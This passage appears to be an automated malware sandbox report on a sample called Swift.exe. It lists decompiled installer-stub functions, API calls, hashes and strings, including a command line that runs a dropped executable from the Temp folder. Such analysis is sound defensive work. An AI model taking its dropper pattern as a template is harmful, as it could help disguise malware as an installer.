\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D4E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C99
"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx, xrefs: 00405BD0, 00405C97, 00405CB4, 00405CC9, 00405CDC, 00405CF8, 00405D23, 00405D53, 00405D59, 00405D71, 00405D84, 00405D9F, 00405DA5, 00405DB0, 00405DDA

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1179465571
Opcode ID: 983b39e261f7d5999fbacdbfcbb28fab341cff8db96e0a31ee49229c0ac8b39f
Instruction ID: af48a517144e64a9aa36acf52f6b91dcbdff1230fb5cbc20a1fc4a70b2118261
Opcode Fuzzy Hash: 983b39e261f7d5999fbacdbfcbb28fab341cff8db96e0a31ee49229c0ac8b39f
Instruction Fuzzy Hash: 0551D231904A45ABEF215B28CC88BBF3BB4DF56314F14823BE511BA2D1D63C5942DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E71(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a1f64; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7a2834;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BA7(0, _t39, 0x79e568, 0x79e568, _a4);
					}
					_t26 = lstrlenA(0x79e568);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7a1f48, 0x79e568);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x79e568;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79e568)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79e568, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e77
0x00404e83
0x00404e86
0x00404e8c
0x00404e98
0x00404e9b
0x00404e9e
0x00404ea4
0x00404ea4
0x00404eaa
0x00404eb2
0x00404eb5
0x00404ed2
0x00404ed6
0x00404edf
0x00404edf
0x00404ee9
0x00404ef2
0x00404efe
0x00404f05
0x00404f09
0x00404f0c
0x00404f1f
0x00404f2d
0x00404f2d
0x00404f31
0x00404f33
0x00404f36
0x00000000
0x00404f36
0x00404eb7
0x00404ebf
0x00404ec7
0x00404ecd
0x00000000
0x00404ecd
0x00404ec7
0x00404eb5
0x00404f40

APIs

lstrlenA.KERNEL32(0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000,?), ref: 00404EAA
lstrlenA.KERNEL32(00402FAB,0079E568,00000000,0078F738,00789938,?,?,?,?,?,?,?,?,?,00402FAB,00000000), ref: 00404EBA
lstrcatA.KERNEL32(0079E568,00402FAB,00402FAB,0079E568,00000000,0078F738,00789938), ref: 00404ECD
SetWindowTextA.USER32(0079E568,0079E568), ref: 00404EDF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F05
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F1F
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F2D

Strings

hy, xrefs: 00404E91

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: hy
API String ID: 2531174081-1473002175
Opcode ID: b6ba76c87729b12bd8c483e29c6338bf84dfbf0bbf216994be6afbd16ec5c758
Instruction ID: 73f6a105a06d41c9a089cf74fd928cf261587deb862061edf3839305d6071f37
Opcode Fuzzy Hash: b6ba76c87729b12bd8c483e29c6338bf84dfbf0bbf216994be6afbd16ec5c758
Instruction Fuzzy Hash: D3219DB2900158BFDB019FA5CD809DEBFB9EB45358F14807AFA04B6291C7389E40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DE7(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056A3("*?|<>/\":", _t5))) == 0) {
							E0040581D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405de9
0x00405df1
0x00405e05
0x00405e05
0x00405e0b
0x00405e18
0x00405e18
0x00405e19
0x00405e1b
0x00405e1f
0x00405e21
0x00405e2a
0x00405e2c
0x00405e46
0x00405e4e
0x00405e4e
0x00405e53
0x00405e55
0x00405e57
0x00405e5b
0x00405e5c
0x00405e5f
0x00405e67
0x00405e69
0x00405e6d
0x00000000
0x00000000
0x00405e73
0x00405e78
0x00000000
0x00000000
0x00000000
0x00405e78
0x00405e7d

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Swift.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E3F
CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
CharNextA.USER32(?,"C:\Users\user\Desktop\Swift.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E51
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,00000000,0040327D), ref: 00405E61

Strings

*?|<>/":, xrefs: 00405E2F
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE8, 00405DED
"C:\Users\user\Desktop\Swift.exe", xrefs: 00405E23

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Swift.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3967937899
Opcode ID: 3b5f3268fa1fae19e58d0ad2ced72642c676bfd811e2c7a6988a98807c9a22ca
Instruction ID: b0216184f69fb2439bb9dad5dfd1616ba24426a5670a1cd35f2052381afc0bd3
Opcode Fuzzy Hash: 3b5f3268fa1fae19e58d0ad2ced72642c676bfd811e2c7a6988a98807c9a22ca
Instruction Fuzzy Hash: 99110872808B9129EB3227248C04B7B7F89CB96750F18447BE5D5722C2D67C5E828FED

Uniqueness

Uniqueness Score: -1.00%

Function 00403EA8 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EA8(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eba
0x00403f4e
0x00000000
0x00403f4e
0x00403ecb
0x00403ecf
0x00000000
0x00000000
0x00403ed5
0x00403ede
0x00403ee1
0x00403ee1
0x00403ee7
0x00403eed
0x00403eed
0x00403ef9
0x00403eff
0x00403f06
0x00403f09
0x00403f0c
0x00403f0e
0x00403f0e
0x00403f16
0x00403f1c
0x00403f1c
0x00403f26
0x00403f2b
0x00403f2e
0x00403f33
0x00403f36
0x00403f36
0x00403f46
0x00403f46
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EC5
GetSysColor.USER32(00000000), ref: 00403EE1
SetTextColor.GDI32(?,00000000), ref: 00403EED
SetBkMode.GDI32(?,?), ref: 00403EF9
GetSysColor.USER32(?), ref: 00403F0C
SetBkColor.GDI32(?,?), ref: 00403F1C
DeleteObject.GDI32(?), ref: 00403F36
CreateBrushIndirect.GDI32(?), ref: 00403F40

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction ID: 491f22848ad6dc1c566f3edba284fffe1ef1eb74b3254969e69aaab1e73b060a
Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
Instruction Fuzzy Hash: 6D218471904705ABCB21DF68DD08B4BBFF8AF01715B048669F856E22E1D734EA04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056E5(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E0040583D(_t52);
				_t27 = E0040585C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x7a2794;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030A9(_t47);
						E00403077(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E71( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040581D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E71(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x7a2808 =  *0x7a2808 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x00402692
0x00402694
0x004026a0
0x004026a3
0x004026ad
0x004026b1
0x004026b1
0x004026b7
0x004026c4
0x004026cc
0x004026cf
0x004026d5
0x004026e3
0x004026e8
0x004026ec
0x004026ef
0x004026f8
0x00402704
0x00402708
0x0040270b
0x00402715
0x00402734
0x0040271c
0x00402721
0x00402729
0x0040272c
0x00402731
0x00402731
0x0040273b
0x0040273b
0x0040274d
0x00402754
0x00402766
0x00402766
0x0040276c
0x0040276c
0x00402777
0x00402778
0x0040277c
0x00402780
0x00402786
0x00402786
0x0040278d
0x0040217a
0x004028a4
0x004028b0

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
GlobalFree.KERNEL32 ref: 0040273B
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
GlobalFree.KERNEL32 ref: 00402754
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 9d1cc30112ef2879773a24166673e9fcd330ef7916019fff29526b59de712de7
Instruction ID: 378fc47ab08ca3d111c90b7a77fa78cd26f064df58295af17a0121438a5793cd
Opcode Fuzzy Hash: 9d1cc30112ef2879773a24166673e9fcd330ef7916019fff29526b59de712de7
Instruction Fuzzy Hash: 6D317871C00128BBDF216FA5DE88DAE7A79EF05364F10422AF924762E1C67949418FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404740 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404740(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x0040474e
0x0040475b
0x00404761
0x0040479f
0x0040479f
0x004047ae
0x004047b5
0x00000000
0x004047b7
0x00404763
0x00404772
0x0040477a
0x0040477d
0x0040478f
0x00404795
0x0040479c
0x00000000
0x0040479c
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040475B
GetMessagePos.USER32 ref: 00404763
ScreenToClient.USER32 ref: 0040477D
SendMessageA.USER32(?,00001111,00000000,?), ref: 0040478F
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047B5

Strings

f, xrefs: 00404791

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction ID: 61f99ab05ed290d86777c20a8df08ed4a00c69b09c34bc09f0959cd11553d998
Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
Instruction Fuzzy Hash: 57014C75D00219BADB01DBA4DC85BFEBBBCAB59711F10412AFA10B72C0D7B4A9418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x789934; // 0x8400
					_t11 =  *0x79d940;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b5e
0x00402b6c
0x00402b72
0x00402b72
0x00402b80
0x00402b82
0x00402b88
0x00402b8f
0x00402b91
0x00402b91
0x00402ba7
0x00402bb7
0x00402bc9
0x00402bc9
0x00402bd1

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
MulDiv.KERNEL32(00008400,00000064,?), ref: 00402B97
wsprintfA.USER32 ref: 00402BA7
SetWindowTextA.USER32(?,?), ref: 00402BB7
SetDlgItemTextA.USER32 ref: 00402BC9

Strings

verifying installer: %d%%, xrefs: 00402BA1

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310965741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311346623.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311356375.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311364853.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311370999.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311440575.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311449919.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.311494423.00000000007AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Swift.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 8622ab3e69be95df963ec565e861e29ba039e38df711665d69b3cb0b2b2d52ae
Instruction ID: a3136dca37930f40451f08386abcfdb1b2288b8d9412d759bd41ea1a6db4ea53
Opcode Fuzzy Hash: 8622ab3e69be95df963ec565e861e29ba039e38df711665d69b3cb0b2b2d52ae
Instruction Fuzzy Hash: 2601F470544209BBDB209F60DD49EAD37A9EB44305F008039FA06B51D1D7B9A9558B95

Uniqueness

Uniqueness Score: -1.00%

Function 00405333 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405333(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407310;
				_v36.Group = 0x407310;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407300;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040533e
0x00405342
0x00405345
0x0040534b
0x0040534f
0x00405353
0x0040535b
0x00405362
0x00405368
0x0040536f
0x0040537e
0x00405380
0x00000000
0x00405380
0x0040538a
0x00405391
0x004053a7
0x00000000
0x00000000
0x00000000
0x004053a9
0x004053ad

APIs

CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405376
GetLastError.KERNEL32 ref: 0040538A
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040539F
GetLastError.KERNEL32 ref: 004053A9

Strings

C:\Users\user\Desktop, xrefs: 00405333

Memory Dump Source

Source File: 00000000.00000002.310942618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.310937128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310950485.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.310959555.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
